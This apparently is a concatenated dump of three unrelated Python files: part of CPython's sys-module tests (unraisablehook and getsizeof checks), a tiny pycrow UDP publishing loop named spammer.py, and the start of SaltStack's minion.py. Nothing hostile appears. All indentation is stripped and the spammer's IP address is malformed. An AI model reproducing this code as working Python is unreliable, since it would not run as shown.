exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, test.support.swap_attr(
sys, 'unraisablehook', sys.__unraisablehook__
):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj"
)
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict (string key)
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('2P'))
longdict = {str(i): i for i in range(8)}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('2P'))
# dict (non-string key)
check({1: 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n4P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c7P2ic??2P'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2P4P4c7P2ic??P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
check(list([]), vsize('Pn'))
check(list([1]), vsize('Pn') + 2*self.P)
check(list([1, 2]), vsize('Pn') + 2*self.P)
check(list([1, 2, 3]), vsize('Pn') + 4*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIP'
s = vsize('2P' + fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P'
'1P' # Specializer cache
)
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("2P"))
# dict with shared keys
[newstyleclass() for _ in range(100)]
check(newstyleclass().__dict__, size('nQ2P') + self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnb"
compactfields = asciifields + "nP"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn3P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn3P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
spammer.py | #!/usr/bin/env python3
#coding: utf-8
import sys
import time
import pycrow
import numpy
import threading
pycrow.set_crowker(".12.109.173.108.206:10009")
pycrow.create_udpgate(12, 10009)
thr = threading.Thread(target=pycrow.spin)
thr.start()
while 1:
time.sleep(1)
arr = numpy.array([256,24])
arr = arr.astype(numpy.float32)
bts = arr.tobytes()
pycrow.publish("fltflt", bts) |
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
from salt.ext.six.moves import range
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.ext.six import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(iter(string_kwarg.keys())) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in arg.items():
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts, include_errors=True)
self.function_errors = self.functions['_errors']
self.functions.pop('_errors') # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
# Only use the first 10 chars to keep longer hashes from exceeding the
# max socket path length.
id_hash = hash_type(self.opts['id']).hexdigest()[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0o177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def minions(self):
'''
Return a dict of minion generators bound to the tune_in method
dict of master -> minion_mapping, the mapping contains:
opts: options used to create the minion
last: last auth attempt time
auth_wait: time to wait for next auth attempt
minion: minion object
generator: generator function (non-blocking tune_in)
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
ret = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
ret[master] = {'opts': s_opts,
'last': time.time(),
'auth_wait': s_opts['acceptance_wait_time']}
try:
minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
ret[master]['minion'] = minion
ret[master]['generator'] = minion.tune_in_no_block()
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
auth_wait = self.opts['acceptance_wait_time']
max_wait = self.opts['acceptance_wait_time_max']
while True:
package = None
for minion in minions.values():
if isinstance(minion, dict):
minion = minion['minion']
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
package = self.epull_sock.recv(zmq.NOBLOCK)
except Exception:
pass
masters = list(minions.keys())
shuffle(masters)
# Do stuff per minion that we have
for master in masters:
minion = minions[master]
# if we haven't connected yet, lets attempt some more.
# make sure to keep separate auth_wait times, since these
# are separate masters
if 'generator' not in minion:
if time.time() - minion['auth_wait'] > minion['last']:
minion['last'] = time.time()
if minion['auth_wait'] < max_wait:
minion['auth_wait'] += auth_wait
try:
t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
except SaltClientError:
log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master))
continue
else:
continue
# run scheduled jobs if you have them
loop_interval = self.process_schedule(minion['minion'], loop_interval)
# if you have an event to handle, do it on a single minion
# (first one to not throw an exception)
if package:
# If we need to expand this, we may want to consider a specific header
# or another approach entirely.
if package.startswith('_minion_mine'):
for multi_minion in minions:
try:
minions[master]['minion'].handle_event(package)
except Exception:
pass
else:
try:
minion['minion'].handle_event(package)
package = None
self.epub_sock.send(package)
except Exception:
pass
# have the Minion class run anything it has to run
next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
